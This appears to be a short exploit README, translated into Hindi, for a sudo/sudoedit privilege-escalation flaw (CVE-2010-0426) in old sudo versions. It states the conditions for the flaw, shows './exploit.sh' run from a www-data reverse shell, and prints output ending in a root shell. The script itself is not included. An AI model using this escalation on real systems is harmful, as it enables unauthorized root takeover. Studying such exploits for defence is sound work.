
sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 - sudo और sudoedit के साथ विशेषाधिकार वृद्धि
https://www.cvedetails.com/cve/CVE-2010-0426/
sudo 1.6.x से पहले 1.6.9p21 और 1.7.x से पहले 1.7.2p4, जब एक स्यूडो-कमांड सक्षम होता है, तो स्यूडो-कमांड के नाम और एक मनमाने निर्देशिका में निष्पादन योग्य फ़ाइल के नाम के बीच मिलान की अनुमति देता है, जो स्थानीय उपयोगकर्ताओं को एक क्राफ्टेड निष्पादन योग्य फ़ाइल के माध्यम से विशेषाधिकार प्राप्त करने की अनुमति देता है, जैसा कि उपयोगकर्ता की होम निर्देशिका में sudoedit नामक फ़ाइल द्वारा प्रदर्शित किया गया है।
विशेषाधिकार बढ़ाएँ जब sudoedit बाइनरी में suid अनुमति हो और sudo के रूप में कोई फ़ाइल संपादित की जा सके (sudo -l से जाँचें)
./exploit.sh
निम्न-विशेषाधिकार revshell से रूट में वृद्धि
www-data@g1vi:/var/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@g1vi:/var/tmp$ ./exploit.sh
[+] Target is vulnerable
[+] Running stuff...
root@g1vi:/var/tmp$ id
uid=0(root) gid=0(root) groups=0(root)
जब भी और जहाँ भी चाहें, स्वतंत्र रूप से उपयोग या संशोधित करें।